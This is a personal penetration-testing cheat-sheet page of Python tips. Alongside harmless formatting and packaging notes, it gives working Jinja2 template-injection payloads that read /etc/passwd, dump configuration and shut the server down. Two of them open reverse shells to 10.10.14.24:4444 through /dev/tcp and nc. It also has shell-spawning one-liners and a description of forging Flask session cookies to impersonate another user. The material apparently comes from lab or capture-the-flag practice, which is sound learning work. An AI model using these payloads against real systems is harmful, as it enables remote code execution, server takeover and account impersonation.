akde/infosec

Information security is ultimately about managing risk

Python

, ,

Con­vert a Python2 script into a Python3 script:

2to3 -w example.py

Fix tab/space/identation problems:

autopep8 -i linuxprivchecker.py

If a library is installed, but can­not found

from smb.SMBConnection import SMBConnection

then try to search the file local­ly and include the path manually:

import sys
sys.path.append("path/to/your/file")

One­lin­er for exe­cut­ing bash in a file:

echo 'import os;os.system("/bin/bash")' > /tmp/e.py

Exe­cute something:

import os
os.system('ls -l')

__import__('os').popen('whoami').read();

os = globals()['os']
print(os.name)

Use python scripts under Windows

If an exploit is avail­able in Python, but the tar­get sys­tem does­n’t have a python instal­la­tion, use in anoth­er Win­dows System/VM PyIn­staller to cre­ate a EXE out of a Python script. Example

# pyinstaller --onefile windows-exploit-suggester.py

Or use https://pypi.org/project/auto-py-to-exe/

Note: In case of an error, try a new­er release (pip install https://github.com/pyinstaller/pyinstaller/archive/develop.tar.gz)

Interpolation

"{name}".format(name="P")
"%s and %d" % ("string", 42)
f"User {user}" # variable user was defined before.

Jinja Template hijacking

Check with {{ 7+3 }} if this is exe­cut­ed, if a Python inter­preter is using the tem­plate jin­ja engine.

{{ 7+3 }}
{{[].__class__.__base__.__subclasses__().pop(40)('etc/passwd').read() }}
{{ request.environ[‘werkzeug.server.shutdown’]() }} // ...

{{ config.items() }} // Read all config variables

Exam­ple:

  1. Exe­cute the fol­low­ing to get an array of avail­able class­es.
    {{ ''.__class__.__mro__[1].__subclasses__() }}

    This returns some­thing like this.


    [<class 'type'>, <class 'weakref'>, <class 'weakcallableproxy'>, ...

  2. Look if this includes Popen. If yes, note the index.
    In this case, we have popen at index 407 (line 408 — 1).
  3. {{”.__class__.__mro__[1].__subclasses__()[407](“bash ‑i >& /dev/tcp/10.10.14.24/4444 0>&1”,shell=True,stdout=-1, stderr=-1).communicate()}}
  4. {{”.__class__.__mro__[1].__subclasses__()[407](“mknod /tmp/backpipe p && /bin/sh 0</tmp/backpipe | nc 10.10.14.24 4444 1>/tmp/backpipe”,shell=True,stdout=-1, stderr=-1).communicate()}}
  • https://medium.com/@akshukatkar/rce-with-flask-jinja-template-injection-ea5d0201b870

Flask

Flask uses a secret key to sign cook­ies. If you have a secret key, you can use flask-unsign to decode a cook­ie you’ve got from the http response.

The sec­ond com­mand from this screen­shot changed the id. The new cre­at­ed cook­ie can be used for a HTTP request which then would imper­sion­ate the user with id 20093.

Leave a Reply

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

Checklists

Categories

Checklists: Ports

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';